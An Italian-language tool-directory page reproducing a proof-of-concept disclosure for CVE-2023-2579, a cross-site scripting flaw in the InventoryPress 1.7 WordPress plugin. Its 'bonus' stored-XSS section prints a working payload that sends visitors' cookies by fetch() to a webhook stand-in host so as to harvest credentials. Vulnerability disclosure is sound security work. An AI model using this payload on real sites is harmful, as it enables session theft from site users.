Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
poc-cve-xss-inventory-press-plugin — PoC per CVE-2023-2579 | Kitploit
Strumenti/GitHubGitHub/0xn4d/poc-cve-xss-inventory-press-plugin
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSviluppo Payload
GitHub0xn4d/poc-cve-xss-inventory-press-plugin

poc-cve-xss-inventory-press-plugin

PoC per CVE-2023-2579

Vedi Repository
123 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Aggiornamento - 23/06/2023

L'ID CVE-2023-2579 è stato riservato e il PoC è stato pubblicato sul sito WPScan: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe

Dettagli

Titolo: Cross-Site Scripting Riflesso Autenticato nel Plugin InventoryPress per WordPress CMS
Data: 2023-04-21
Autore: Danilo Albuquerque
Homepage del fornitore: https://wordpress.org
Link del software: https://wordpress.org/download
Versione: WordPress 6.2
Nome e versione del plugin: InventoryPress 1.7
Testato su: Brave (Versione 1.50.119 Chromium: 112.0.5615.121 (Versione ufficiale) 64 bit)

PoC per la vulnerabilità XSS Riflesso in InventoryPress 1.7

  1. Vai alla pagina in cui puoi aggiungere gli articoli all'inventario;
  2. Inserisci il payload malevolo nel campo "Descrizione" del modulo;
  3. Accedi al link del nuovo articolo generato dal plugin;

Quando fai tutto questo e aggiorni la pagina corrente, verrà visualizzato il pop-up di avviso con il messaggio al suo interno.

Screenshot qui sotto

  1. Vai alla pagina in cui puoi aggiungere gli articoli all'inventario:
    image

  • Inserisci il payload malevolo nel campo "Descrizione" del modulo:
    image

  • Accedi al link del nuovo articolo generato dal plugin:
    image

  • Una volta effettuata la richiesta, viene mostrato il pop-up di avviso:
    image

  • Bonus - PoC per XSS Memorizzato

    1. Aggiungi il seguente payload per rubare i cookie nel campo "Descrizione": <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. Quindi pubblica un nuovo articolo o aggiornane uno esistente;

    2. Attiva e ottieni le credenziali nel sito Webhook

    3. Aggiunta del payload e pubblicazione dell'articolo (o aggiornamento): image

    4. Attivazione e ottenimento delle credenziali: image

    Scarica lo strumento